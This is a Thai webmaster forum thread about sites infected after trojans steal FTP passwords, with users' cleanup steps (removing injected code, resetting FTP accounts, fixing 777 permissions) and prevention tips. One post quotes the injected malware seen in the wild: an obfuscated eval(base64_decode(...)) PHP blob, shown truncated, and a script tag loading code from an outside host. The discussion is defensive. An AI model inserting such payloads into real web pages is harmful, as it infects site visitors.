ไวรัสที่ติดเข้าเว็บ มาจากไหน?

[LittleCat]

Credit : ธุลีดาว
ปัญหาว่าเว็บมีอาการแปลกๆ เช่นจะมี code แปลกติดมาทุกหน้า
สาเหตุนั้นเกิดมาจากเว็บนั้นติดไวรัส (หรือโทรจัน)


แล้วในเว็บติดมาได้ยังไงล่ะ?

เมื่อคอมฯ ที่เราใช้งานติดไวรัส (หรือโทรจัน) จะมีไวรัสบางตัว
ที่มีพฤติกรรมขโมยรหัสผ่านของ FTP ที่เราใช้ upload หน้าเว็บขึ้นไปเก็บใน host

เมื่อมันได้รหัสผ่านไปแล้ว มันก็สามารถที่จะต่อเข้าไปยัง host
ด้วยรหัสผ่านของเรา จากนั้นก็เข้าไปแทรก script ไว้กับหน้าเว็บ
ทำให้เว็บเรามี code แปลกปลอม


ถ้าโดนไปแล้ว จะแก้ปัญหายังไงดี?

• กำจัดไวรัสในเครื่องให้หมด แต่ถ้าใช้ anti virus ในเครื่องเรา scan อาจตรวจไม่เจอ
  เพราะไวรัสมันจัดการเครื่องเราซะงอมพระรามไปแล้ว
  ถ้าลำบากนักก็ format ทิ้งเลย ง่ายดี  ;D
• เข้าไปไล่ลบ code ที่ถูกแทรก ทุกๆ หน้า (ทั้ง html, php, asp, jsp)
• ให้เข้าไปที่หน้าจัดการระบบของ host นั้นๆ แล้วลบ FTP user account ให้หมด
• จากนั้นสร้าง FTP user account ขึ้นมาใหม่ ควรจะให้ user name และ password ต่างจากเดิม

จะป้องกันไวรัสติดคอมฯ ได้ยังไงบ้าง

• ขยัน update ข้อมูลไวรัสให้ตัว anti virus และเปิดใช้งานไว้ด้วยนะ  ;)
• ใช้โปรแกรมจำพวก anti autorun เช่น Ardv (แนะนำเป็นการส่วนตัวเลย ตัวนี้โดนใจมาก)  ;D
• IE 6 เก็บเข้ากรุ เลิกใช้ได้เลย ถ้าเป็นไปได้ แนะนำ FireFox, Opera, Chrome, Safari
  โปรแกรม browser ตัวอื่นๆ ที่เป็นหน้ากากครอบ IE ก็ไม่แนะนำให้ใช้
• พยายามอย่าใช้โปรแกรม crack ทั้งหลาย หันมาใช้พวก Open Source ดีกว่า
  หรือถ้ายังอยากใช้โปรแกรมละเมิดลิขสิทธิ์ ก็ใช้เป็น serial ดีกว่า crack
• สวดมนต์ ทำบุญสร้างกุศลเยอะๆ  :D

และคอมฯ เครื่องที่ใช้ในการ upload ขึ้น host
ก็ไม่ควรใช้คอมฯ ที่เป็นเครื่องสาธารณะใช้กันหลายมือ
ถ้าไม่ชัวร์ว่าปลอดไวรัสสนิท  ;)

[ก๊วนกวน]

อ่านโดยรวม อาจจะจริงและไม่จริง
 ด้วยอ่ะ ในความคิดผมเอง นะ

[เซียวเหล่งนึ่งฯ]

การแพร่กระจายมี 2 แบบ
1. แบบไวรัส แบบนี้ไม่น่ากลัว ถ้าในเครื่องคนทำเว็บมีแอนติไวรัสที่ดีพอ
    ทดสอบได้โดยการอัพไฟล์แล้ว ลองโหลดกลับมาเช็ค  ปกติมักจะเป็นกับเครื่องเซิฟเวอร์มากกว่า
    เพราะมันจะกินไฟล์ นามสกุลนั้นๆ ในโอเอสที่มันทำงานได้ เช่น .พีเอชพี  ในลีนุก

    พูดง่ายๆคือถ้าเครื่องเซิฟเวอร์ของเราหรือของโฮสต์ติด มันก็จะติดทุกไฟล์นามสกุลนั้นๆ-ทุกเว็บ-
    แก้โดยโดยการใช้คำสั่งจิปาถะของลีนุกแต่มันเสียเวลา โดยมากเขาก็ฟอร์แม็ตกัน
    แต่มันเดือดร้อนคนทำเว็บที่อยู่ในเครื่องนั้น 

2. แบบเจตนาปล่อย  แบบนี้ก็มี โดนกันมาเยอะ แฮ็คแล้วก็ทิ้งชื่อตัวเองไว้ให้เจ้าของเว็บด่าเล่นๆ
    หรือแค่ปล่อยสคริปมาฝังในไฟล์เท่านั้น เกิดขึ้นได้ยังไง

    แน่นอนพาสเวิดเอฟทีพี เป็นสิ่งที่ควรดูเป็นอันดับแรกตามหลักการ  แต่ต่อให้เขาไม่มีพาสเวิดเอฟทีพี
    เขาก็เจาะได้ถ้าเราเปอร์มิสชั่นเป็น 777 ทิ้งเอาไว้


อื่นๆ

ใช่ครับโดนไวรัส
โซนไอทีก็เคยเจอ
http://svz.in.th/node/virus-in-zone-it.html

ครับ แล้วไม่ทราบว่ามีวิธีีแก้ไขหรือป้องกันยังไงครับ ผมเพิ่งเข้าไปลบสคริปท์มันออกไป (ลบด้วยมือ) ทุกไฟล์ index และเซ็ท chmod เป็น 644 ส่วนโฟลเดอร์เป็น 755 และรีเซ็ท pass เข้า FTP ใหม่ น่าจะพอเพียงรึยังครับเนี่ย

แก้ได้แล้วครับ ผมเจอโค้ด html แทรกในบรรทัดสุดท้ายในไฟล์ index.php ทุกหน้า ไม่รู้มันมาได้ยังไง พอลบออกก็หายแล้วครับ

สแปม.. เอชทีเอ็มแอล 

การทำงาน
มันจะแทรกโค๊ด ไอเฟรม.. เข้าไปในทุกไฟล์ที่เป็นอินเด็ก

ผลกระทบ
แอนติไวรัสจะมองว่าไฟล์เหล่านั้นคือโทรจัน

แก้ปัญหา
- ลบด้วยมือ ทุกไฟล์ที่มีคำว่าอินเด็ก
- รันสคริปพีเอชพี ลบบรรทัดนี้ออก (อันนี้ทำไม่เป็น

การป้องกัน
ไม่เซ็ต 777

สแปมกากพวกนี้ทำงานคล้ายกัน
กินไฟล์เซ็ตติ้งมั่ง กินไฟล์อินเด็กมั่ง

อยู่ที่เราผู้ดูแลเว็บจะรอบคอบไหม
บางคน chmod 777 จนเคยชิน หรือเปลี่ยน 777 เพื่อให้ทำงานง่ายขึ้น
แต่ดันลืมเปลี่ยนกลับ  พอโดนสแปมทีก็อ้วกเลย

อย่าง เอสเอ็มเอฟ นึกดูว่ามีไฟล์อินเด็กกี่ไฟล์ ..  แทบจะทุกโฟลเดอร์ นั่งลบ นั่งอัพ
ใช้เวลาเป็นชั่วโมง

ดังนั้นการเปอร์มิสชั่น chmod จึงสำคัญ
Read  อ่าน
Write  เขียน
Execute ประมวลผล
ถ้า 777 ก็จะหมายถึง ใครก็ได้จากไหนก็ได้ อ่านเว็บเราได้ เขียนไฟล์ทับหรืออัพได้ ประมวลผลไฟล์ต่างๆได้

   ข้อสังเกตุอีกข้อ 1 คือ โดน SPAM HTML แล้วสำหรับบร์อด smf จะกดแสดงตัวอย่างไม่ได้


justusers.net/forum/index.php?topic=2633.0

ปัญหาอีกอย่างคือ ถ้า โดน SPAM HTML แล้ว ตัวสะแกนของคนที่เข้าประจำจะไม่แสดงเลย

จริงหรือเปล่า

1. ไม่เคยสังเกตุเหมือนกันว่าเว็บที่โดนจะมีอาการพิเศษแบบไม่แสดงตัวอย่างไหม
ต้องลองเว็บของคนอื่นๆที่โดนเข้าไปว่ามีอาการคล้ายของท่านเทนโด ตามกระทู้ 2633.0 หรือไม่
หรืออีกอย่าง เอาโค๊ดไปแปะเว็บตัวเองแล้วลองเลย 555+ (อันนี้อย่าทำดีกว่า)

2.ตัวสะแกนของคนที่เข้าประจำจะไม่แสดงเลย
** ไม่ใช่แน่นอน ถ้าแอนติไวรัสยังสุขภาพดีอยู่  เข้าแล้วมันต้องเด้งแน่นอน
ทั้งแอนติไวรัส แอนติสปายแวร์เด้งหมดแหละ

อีกอย่างคือไม่รู้ว่ามันมีการส่งสคริปออกไปไหม หรือส่งเมล์หรือเปล่า
ถ้ามันมีการส่ง เดี๋ยวทางโฮสต์อาจจะส่ง จดหมายรัก มาหาเราได้

โทรจันมาจากไหน
มาจากการอัพไฟล์ที่มีโทรจันขึ้นโฮสต์ โดยอาจจะรู้เท่าไม่ถึงการณ์ 

เพราะฉะนั้นการให้สิทธิ์ใช้งานเอฟทีพี ควรพิจารณาให้ดีว่าจะให้ใครใช้ได้บ้าง
และไฟล์ธีมแปลกๆ หรือไฟล์ที่ไม่รู้จัก -ซอฟแวร์-คีเจน  ไม่ควรอัพขึ้นโฮสต์
เพราะนั่นจะเป็นต้นเหตุของสคริปแทรกพวกนี้

จะ777 ทั้งบอร์ดก็ได้ แต่ทำเสร็จแล้วก็ต้องกลับคืน 755 ไม่งั้นเสร็จได้ง่ายๆ

หรือไม่อีกวิธีคือ ก่อนลงเราก็ดูซะก่อนว่ามันต้องใช้ไดเรคทอรี่ไหนบ้าง ก็ทำเฉพาะที่จำเป็นให้เป็น 777
เสร็จแล้วค่อยปรับคืน

แต่ก็ยังมีบางโฟลเดอร์ที่ทำเสริม จำเป็นต้อง 777 ไว้ตลอด อย่างโฟลเดอร์อัพโหลด หรือแชท

สำหรับ เอสเอ็มเอฟ การ 777 ทั้งบอร์ดก็แน่นอนว่าโดนสคริปไฟล์เอชทีเอ็มแอลแน่นอน
ซีเอ็มเอสอย่างอื่นก็เหมือนกัน  นุ๊ก แมมโบ จุมลา  ขืน 777 ก็โดนแฮ็คทั้งนั้น
เวิดเพรส 777 ทิ้งไว้ บทความบล็อกที่เขียนมีสิทธิ์หายเกลี้ยง

[เซียวเหล่งนึ่งฯ]

ตอนนี้มีมาอีกแบบ ไม่ใช่ iframe แล้ว 

โค๊ดประมาณนี้

โค๊ด: [Select]

eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygneHJndycpKXtmdW5jdGlvbiB4cmd3KCRzKX
tpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1
hcyR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD
8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7a
WYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8f
CgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdf
bWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14 XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk I2lzJywkcywkYSkpZ
?php
ถ้าเป็น เอชทีเอมแอล ในโฮสต์เดียวกันก็จะติด

โค๊ด: [Select]

<script src=http://forums.indianmoneyplus.com/cgi-bin/profile-edit.php ></script>

ปัญหาเพราะเครื่องพีซีที่ใช้ทำเว็บ ติดไวรัสหรือโทรจันชนิดนี้ 
พอใช้เครื่องต่อ เอฟทีพี ปุ๊บ  ก็จะถูกแคปรหัสผ่านเอฟทีพีทันที 
แล้วส่งกลับให้เซิฟเวอรืของโทรจันนั้น   จากนั้นก็จะแทรกสคริป แล้วอัพไฟล์มาทับของเรา
รวมถึงทำให้เปร์มิสชั่นเพี้ยนไปด้วย 

วิธีแก้ 
1. ลบ หรือแก้พาสเวิดเอฟทีพี
2. ฟอร์แมตพีซีตัวปัญหา  (ต้องหาเองเองว่าเป็นของใคร ในกรณีแอดมินหลายคน)
    ต้องฟอแม็ตเพราะมันคงฝังตัวจนแอนติไวรัสของเครื่องไม่สามารถจัดการได้
3. ฟลังจากฟอแม็ตเครื่อง ต่อเอฟทีพีใหม่ แล้วไล่แก้โค๊ดไวรัสออกให้หมด 
4. เปอมิสชั่นไฟล์ 644  โฟลเดอร์ 755

วิธีป้องกัน 
1. เครื่องที่ใช้ทำเว็บ   ให้ใช้ ไออี8 โครม หรือหมาย่าง  (ไออี6 ห้ามเด็ดขาด)
2. ถ้าเป็นเอ็กพี เป็นไปได้ให้ใช้  แพ็ค3 
 

ถ้ามี Webmaster หลายคน และใช้ FTP เดียวกัน นั่นแหละไวรัสมาจากคนใดคนหนึ่ง

ใช้ Google Webmaster Tools ช่วยหาไวรัส และแจ้งยกเลิกว่ามีไวรัส

[supachet2526]

ผมก็เคยเจอปัญหานี้เหมือนกันจนพบว่ามันมาจาก ftp ผมเลยเลิกใช้และใช้การ brows file ด้วย Control ของ host ซึ่งจะปลอดภัยกว่าครับ

[LittleCat]

ผมก็เคยเจอปัญหานี้เหมือนกันจนพบว่ามันมาจาก ftp ผมเลยเลิกใช้และใช้การ brows file ด้วย Control ของ host ซึ่งจะปลอดภัยกว่าครับ

ตกลงมันติดผ่าน ftp หรือติดจากไวรัสที่ฝังเครื่อง ...

ตอนนี้บอร์ดจัสต์กำลังทำการทดลองอยู่

ปล. การกลับมาครั้งนี้ ใช้อีกเครื่องนึงอัพไฟล์จากฮาร์ดดิสแบบเสียบ usb จ้า

[unname]

ตกลงมันติดผ่าน ftp หรือติดจากไวรัสที่ฝังเครื่อง ...

เป็นได้หมดเลยครับ

ถ้า host server เป็น Windows นี่ยิ่งสบาย (ไวรัส) เลยล่ะครับ

เพราะว่า Windows เค้าเก่ง รันไวรัสได้ไวอย่างยิ่ง

และ virus, worm ส่วนมาก จะใช้ชุดคำสั่ง Win32 เป็นตัวทำงาน (ช่องโหว่ของ Windows)

ถ้า host เป็น linux , unix (ไม่มีแล้วมั้ง ?) นี่โอกาสติดไวรัสมี (แต่ถือว่าน้อย) แต่ว่า server ไม่รันไฟล์ไวรัส ด้วยว่า linux ไม่รันไฟล์ execute ของ windows (แต่ worm เก่งๆ ก็มีหนทางอื่นที่ทำให้แพร่ตัวเองได้อยู่ดี ผ่านช่องทางอื่น)

แต่... อย่างน้อย การแพร่ ก็ยังช้ากว่า Windows Server อยู่ดี (คิดว่า.... นะ)

.... ในเมื่อ OS พัฒนาขึ้นเรื่อยๆ ได้ , Virus tool (โปรแกรมสร้างไวรัส) ก็พัฒนาขึ้นเรื่อยๆ เช่นกัน - จึงไม่มีอะไรที่ปลอดภัยได้ 100% ในโลกไซเบอร์

[ไร้นาม (ยังไม่ login)]

รายงานผลครับ :

FF เข้าไม่ได้อีกแล้วนะครับ , ขึ้นคำเตือน

เว็บไซต์ ..จัส - พิมพ์ชื่อลิ้งค์ไม่ได้ - ... ถูกรายงานว่าเป็นเว็บอันตรายและถูกปิดกั้นตามค่าปรับแต่งด้านความปลอดภัยของคุณ

ขึ้นหน้าแรก ไม่มีกรอบสีๆ (theme ไม่ถูกใช้) , เข้าแต่ละหน้าไม่ได้ , กดตอบไม่ได้ บลาๆ

[เซียวเหล่งนึ่งฯ]

เรียบร้อยละ 
ขอรอดูอีกสัก 24 ชั่วโมง

[กฤติยา]

 

[กฤติยา]

เวลาคนเข้ามาดูบอร์ดและมีไวรัสอยู่ในเครื่อง อยู่แล้ว มีไวรัสมีโอกาสเข้าสู่เวปที่เรากำลังดูอยู่หรือเปล่า  ปัญหาคาใจ

[ไก่ขี้เมา]

เวลาคนเข้ามาดูบอร์ดและมีไวรัสอยู่ในเครื่อง อยู่แล้ว มีไวรัสมีโอกาสเข้าสู่เวปที่เรากำลังดูอยู่หรือเปล่า  ปัญหาคาใจ

คนเข้าบอร์ด จะใช้ได้แค่คำสั่งในบอร์ดครับ , ถ้าไม่เปิดช่องโหว่ไว้ก็ไม่สามารถทำอะไรกับระบบเว็บเราได้ (อย่างน้อยๆ ก็กัน SPAM ได้มั่งล่ะ)

* "บอร์ด" ในที่นี้อาจจะเป็น "CMS ยี่ห้อหนึ่ง" หรือ "โค้ดเว็บบอร์ดแจกฟรี" ความปลอดภัยมันแตกต่างกันจ้า

เห็นบางที่เค้าลงเว็บบอร์ด (แบบที่ได้มาจาก Free Source code from Google)

ใช้ได้ไม่เท่าไร นอกจาก SPAM แล้ว ไฟล์ในหน้าเว็บก็ยังโดน hack เปลี่ยนไปเป็นหน้าที่ใครซักคนทำให้ (โดยเราไม่ได้ขอ)

[เซียวเหล่งนึ่งฯ]

มันจะมีผลกับคนที่ใช้รหัสเอฟทีพีเท่านั้นแหละ 
มันไม่ได้สร้างความเสียหายให้กับเครื่องนะ แต่สร้างความเสียหายให้กับระบบเว็บแอพฯ ทั้งหลายแหล่

[ไก่ขี้เมา]

มันจะมีผลกับคนที่ใช้รหัสเอฟทีพีเท่านั้นแหละ  ...

ผมคุ้นๆ ว่ามันมีการ attack จาก port ของ MySQL ได้ด้วยหรือเปล่าครับ

และถ้าเว็บที่ใช้ free webboard (แบบเขียนเองง่ายๆ) ส่วนมากมักจะเขียนขึ้นมาแบบง่าย และเก็บ user/pass ไว้ในไฟล์หนึ่งไฟล์ ซึ่งสามารถหาวิธีเอามาใช้ได้อย่างง่ายมากๆ

พอเอามาได้แล้วก็ดำเนินการยืมพอร์ดของ MySQL เพื่อเจาะเข้าไปแก้ไขอื่นๆ ต่อไป

....
ถ้าเข้าใจผิดก็ขออภัยครับ เรื่องเน็ตเวิร์กผมวางเก็บไว้นานมากแล้วล่ะ

(นี่ก็คิดอยู่ว่าจะเลิกทำคอม ไปจับงานเกษตรแทน )

[เซียวเหล่งนึ่งฯ]

แคปพาสจากดีบียังไม่เคยเจอท่าน  อย่าให้เจอเลย 555+
แค่เอฟทีพีนี่ก็แทบแย่ละ  เอิ๊กๆ